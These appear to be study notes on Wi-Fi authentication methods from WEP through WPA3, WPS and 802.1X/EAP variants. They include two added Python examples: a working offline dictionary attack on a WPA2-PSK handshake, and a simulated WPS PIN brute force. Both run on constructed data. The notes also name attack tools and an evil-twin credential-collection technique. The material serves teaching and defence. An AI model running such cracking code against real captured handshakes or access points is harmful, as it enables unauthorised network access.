WIRELESS AUTHENTICATION METHODS
These methods authenticate the device, not the user: there is no username, only a password, the PSK (Pre-Shared Key), and because no certificates are involved none of them uses TLS.
WEP (Wired Equivalent Privacy)
· Built on RC4 – a 24-bit IV (Initialization Vector) is prepended to the PSK (Pre-Shared Key) to form each packet's RC4 key
· Prone to IV (Initialization Vector) attacks – the 24-bit IV space is exhausted quickly on a busy network, IVs repeat, and statistical attacks on the resulting weak RC4 keys recover the PSK from captured traffic
WPA (Wi-Fi Protected Access)
· Built on RC4 – uses TKIP (Temporal Key Integrity Protocol), a per-packet key-mixing layer added so that WEP-era hardware could be upgraded in firmware
· Personal Mode (PSK) or Enterprise Mode (802.1X with a RADIUS server)
· The PSK is prone to offline dictionary / brute force attacks – one captured 4-way handshake is enough to test candidate passphrases without ever talking to the AP again
WPA2 (Wi-Fi Protected Access 2)
· Built on AES – uses CCMP (Counter Mode with CBC-MAC Protocol)
· Personal Mode (PSK) or Enterprise Mode (802.1X with a RADIUS server)
· The PSK is prone to the same offline dictionary / brute force attack as WPA – the key derivation is identical, only the handshake MIC algorithm differs (HMAC-MD5 for WPA, HMAC-SHA1-128 for WPA2), so passphrase length and randomness are the only defense
· AES replaced RC4, CCMP replaced TKIP (TKIP is often still allowed in "WPA/WPA2 mixed" mode for compatibility and should be disabled)
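The attack described in the WPA and WPA2 bullets, as an added example that is not part of the original post: both sides of the 4-way handshake are simulated with constructed values (the SSID, MAC addresses, nonces, passphrase and wordlist are all made up), the derivation follows IEEE 802.11i for WPA2/CCMP (PBKDF2-HMAC-SHA1 to the PMK, PRF-512 to the PTK, HMAC-SHA1-128 MIC over the EAPOL-Key frame), and the cracking loop uses nothing beyond what a passive sniffer captures. All function and variable names are the example's own.

```python
"""Offline dictionary attack on a WPA2-PSK 4-way handshake (added example, constructed data)."""
import hashlib
import hmac
import struct

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + key ID (8).
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0.., concatenated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs) || max(MACs) || min(nonces) || max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_key_frame(key_info, replay_counter, nonce, key_data=b""):
    """Minimal RSN EAPOL-Key frame with the MIC field zeroed."""
    body = struct.pack("!BHHQ", 2, key_info, 16, replay_counter)  # descriptor type 2 (RSN), key info, key len, replay ctr
    body += nonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)    # key nonce, key IV, key RSC, key ID, key MIC (zero)
    body += struct.pack("!H", len(key_data)) + key_data
    return struct.pack("!BBH", 2, 3, len(body)) + body             # EAPOL version 2, type 3 = EAPOL-Key


def compute_mic(kck, frame):
    """Key descriptor version 2 (WPA2/CCMP): MIC = first 128 bits of HMAC-SHA1(KCK, frame with MIC zeroed)."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def four_way_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """Simulate AP and station; return only what a passive sniffer would see."""
    pmk = pmk_from_passphrase(passphrase, ssid)             # both sides already hold the PMK via the passphrase
    m1 = build_eapol_key_frame(0x008A, 1, anonce)           # M1, AP -> STA: ANonce in the clear, no MIC
    ptk = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)  # station picks SNonce and derives the PTK
    kck = ptk[:16]                                          # KCK = first 128 bits of the PTK
    m2 = build_eapol_key_frame(0x010A, 1, snonce)           # M2, STA -> AP: SNonce in the clear + MIC
    m2 = m2[:MIC_OFFSET] + compute_mic(kck, m2) + m2[MIC_OFFSET + 16:]
    assert hmac.compare_digest(compute_mic(kck, m2), m2[MIC_OFFSET:MIC_OFFSET + 16])  # AP verifies M2
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": m1[17:49], "snonce": snonce, "m2": m2}  # ANonce parsed from M1 as a sniffer would


def crack_psk(capture, wordlist):
    """Offline: each candidate passphrase is checked against the captured M2 MIC; the AP is never contacted."""
    observed_mic = capture["m2"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = derive_ptk(pmk, capture["ap_mac"], capture["sta_mac"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(compute_mic(ptk[:16], capture["m2"]), observed_mic):
            return candidate
    return None


# Constructed sample (not a real capture): SSID, MACs, nonces, passphrase and wordlist are all made up.
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "12345678", "sunflower2019", "letmein123"]


def demo_capture():
    return four_way_handshake("sunflower2019", "CorpGuest", AP_MAC, STA_MAC, ANONCE, SNONCE)


if __name__ == "__main__":
    cap = demo_capture()
    print("recovered PSK:", crack_psk(cap, WORDLIST))                       # sunflower2019
    print("passphrase not in wordlist:", crack_psk(cap, ["password"]))    # None
```

The expensive step is the 4096-iteration PBKDF2 per candidate, which is exactly what GPU crackers parallelise; a long random passphrase is the only thing that makes the wordlist fail. WPA differs only in `compute_mic` (HMAC-MD5 instead of HMAC-SHA1), so the same capture-and-guess loop applies to it.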
WPA3 (Wi-Fi Protected Access 3)
- WPA3-Personal still encrypts traffic with AES-CCMP; GCMP-256 (Galois/Counter Mode Protocol) is required only in the 192-bit mode of WPA3-Enterprise
- Replaces the PSK-based 4-way key derivation with SAE (Simultaneous Authentication of Equals, the Dragonfly handshake) – a password is still used, but a captured exchange cannot be used for offline guessing, every guess needs a live interaction with the AP, and each session gets its own forward-secret key
- Makes PMF (Protected Management Frames) mandatory, which also removes the forged deauthentication trick used to force a client into a fresh handshake
WPS (Wi-Fi Protected Setup)
- Connection normally set up with a push button (PBC mode) on the AP
- If there is no push button, the 8-digit PIN printed on the label on the bottom of the AP is entered instead
- Prone to an online brute force attack: the registrar proves the PIN in two halves (first four digits, then the last three plus a checksum digit), so an attacker needs at most 10,000 + 1,000 = 11,000 attempts rather than the 10^7 valid 8-digit PINs
- Tools used for attacking WPS: Wash (finds WPS-enabled APs and whether they are locked), Reaver (PIN brute force), Wifite (automates both)
- Mitigation: disable WPS PIN mode entirely; lockout after repeated failed PINs only slows the attack down, it does not remove the flaw
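The two-halves weakness behind the 11,000-attempt figure, as an added example that is not part of the original post: the checksum routine is the one WPS specifies for the 8th PIN digit, the registrar is a stand-in (made up for the example) that reports the same two failure points the real protocol does (NACK after M4 for a wrong first half, NACK after M6 for a wrong second half), which is what Reaver relies on, and the PINs are constructed. Class and function names are the example's own.

```python
"""Why a WPS PIN falls in at most 11,000 online guesses (added example, simulated registrar)."""


def wps_checksum(pin7: int) -> int:
    """Checksum digit (8th digit) of a WPS PIN computed from its first 7 digits, as WPS specifies."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedWpsRegistrar:
    """Stand-in for the AP's WPS registrar (constructed for the example).

    The real protocol proves the PIN in two halves: E-Hash1 covers digits 1-4 and is
    checked at M4, E-Hash2 covers digits 5-8 and is checked at M6. The registrar thus
    tells the enrollee at which message a guess failed, and that is the leak.
    """

    def __init__(self, pin: str):
        if not is_valid_wps_pin(pin):
            raise ValueError("PIN must be 8 digits with a valid checksum digit")
        self.pin = pin
        self.attempts = 0

    def attempt(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK after M4"   # first half wrong
        if pin[4:] != self.pin[4:]:
            return "NACK after M6"   # first half right, second half wrong
        return "M7"                  # PIN accepted, AP hands over its WPA credentials


def brute_force_wps(registrar: SimulatedWpsRegistrar):
    """Return (pin, attempts). Phase 1: up to 10^4 guesses for the first half; phase 2: up to 10^3 for the second."""
    first = next(
        f for f in range(10_000)
        if registrar.attempt(f"{f:04d}0000") != "NACK after M4"   # second half is a placeholder in phase 1
    )
    for second in range(1_000):
        pin = f"{first:04d}{second:03d}{wps_checksum(first * 1000 + second)}"  # checksum is computed, not guessed
        if registrar.attempt(pin) == "M7":
            return pin, registrar.attempts
    raise RuntimeError("first half accepted but no second half matched")


if __name__ == "__main__":
    for secret in ("12345670", "99999995"):   # constructed PINs; 99999995 is the worst case for the search
        pin, n = brute_force_wps(SimulatedWpsRegistrar(secret))
        print(f"recovered {pin} after {n} attempts (search space without the leak: 10^7 valid PINs)")
```

The worst case is 10,000 + 1,000 attempts, and the last digit is never guessed because the checksum is public. Against a real AP each attempt is a full M1..M6 exchange, so lockout and rate limiting matter, but the fix is to turn PIN mode off.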
The following methods authenticate the user rather than the device and rely on certificates; the certificate is used to set up a TLS handshake between the Supplicant and the authentication server, so all of them run over TLS.
Enterprise Mode / 802.1X Authentication
- Using this method requires a RADIUS server (the AAA server)
- Authentication can be accomplished with a username & password, smart card, or token
- Credentials are checked by the RADIUS server against an enterprise directory service (e.g., Active Directory or LDAP)
- 802.1X requires a Supplicant (the client), an Authenticator (the AP or switch) and an Authentication server (AAA / RADIUS); EAP messages travel over EAPOL between Supplicant and Authenticator and inside RADIUS attributes between Authenticator and server, so the AP never handles the user's credentials, and each client ends up with its own PMK instead of a passphrase shared by everyone
EAP-TLS (Extensible Authentication Protocol-Transport Layer Security)
- Certificates required on both the server and the wireless device (Supplicant)
- Provides mutual authentication
- Authenticates the user (or machine) by the identity in the client certificate, which is mapped to an account in the enterprise directory service
- The strongest of these methods, but it needs a PKI that can issue and revoke client certificates
EAP-TTLS (Extensible Authentication Protocol – Tunneled Transport Layer Security)
- Certificate on the server only
- Authenticates the user with an inner method (PAP, CHAP, MS-CHAPv2 or another EAP method) against the enterprise directory service, so legacy password stores can be used
- End-to-end protection of authentication credentials – the inner exchange is wrapped in the TLS tunnel between Supplicant and RADIUS server
PEAP (Protected Extensible Authentication Protocol)
- Certificate on the server only
- Uses TLS to build the outer tunnel; the usual inner method is EAP-MSCHAPv2 (PEAPv0)
- Authenticates the user – uses an enterprise directory service
- End-to-end protection of authentication credentials – but only if the Supplicant validates the server certificate (trusted CA and expected server name). A client configured to skip that check will build the tunnel to an evil-twin AP with its own RADIUS server, which then collects the MS-CHAPv2 challenge/responses for offline cracking
The following authenticate the user and do not use certificates
LEAP (Lightweight Extensible Authentication Protocol)
- Cisco-proprietary; does not require certificates
- MS-CHAP-style challenge/response, so the password hash can be recovered offline from a sniffed exchange (this is what the asleap tool does)
- Deprecated and replaced with EAP-FAST
EAP-FAST (Flexible Authentication via Secure Tunneling)
- Cisco; does not need certificates – the TLS tunnel is established from a PAC (Protected Access Credential) shared between client and server (a server certificate is optional)
- Replaced LEAP
- The PAC must be provisioned securely (out of band or over a server-authenticated tunnel); anonymous in-band provisioning is exposed to man-in-the-middle attacks
The following is RADIUS federation
- Multiple organizations allow access to one another's users; eduroam is the best-known example
- Uses the native 802.1X client (Supplicant) – the visiting user configures nothing new
- Each organization has its own RADIUS server and joins a mesh (or hierarchy) of RADIUS proxies; the visited server forwards the Access-Request to the user's home server based on the realm in the identity (the part after the @), and the EAP exchange inside it stays protected end to end by the home server's TLS tunnel